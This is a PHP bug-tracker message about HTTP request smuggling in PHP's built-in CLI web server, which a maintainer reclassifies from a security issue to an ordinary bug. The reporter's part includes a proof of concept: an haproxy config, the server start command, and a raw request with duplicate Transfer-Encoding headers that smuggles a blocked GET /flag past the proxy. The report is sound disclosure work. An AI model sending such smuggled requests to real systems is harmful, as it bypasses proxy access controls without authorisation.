Sec Bug->Bug #80043 [Opn]: HTTP Request Smuggling in php webserver
| From: | stas@php.net | Date: | Tue, 01 Sep 2020 07:12:42 +0000 |
| Subject: | Sec Bug->Bug #80043 [Opn]: HTTP Request Smuggling in php webserver | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-228828@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=80043&edit=1
ID: 80043
Updated by: stas@php.net
Reported by: kn0wns1c at gmail dot com
Summary: HTTP Request Smuggling in php webserver
Status: Open
-Type: Security
+Type: Bug
Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git)
Block user comment: N
Private report: Y
New Comment:
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
Previous Comments:
------------------------------------------------------------------------
[2020-09-01 07:09:28] kn0wns1c at gmail dot com
Description:
------------
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to
two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a
legal request. a attacker may use this feature make a HTTP Request Smuggling attack.
for example, using haproxy to make CL-TE attack:
haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI
```
global
daemon
maxconn 256
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend http-in
bind *:80
default_backend servers
acl url_403 path_beg -i /flag
http-request deny if url_403
backend servers
server server1 127.0.0.1:8080 maxconn 32
```
run php webserver
```
php -S 127.0.0.1:8080
```
use this http request can bypass haproxy /flag restrict
```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50
1
A
0
GET /flag HTTP/1.1
Host: 127.0.0.1
```
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=80043&edit=1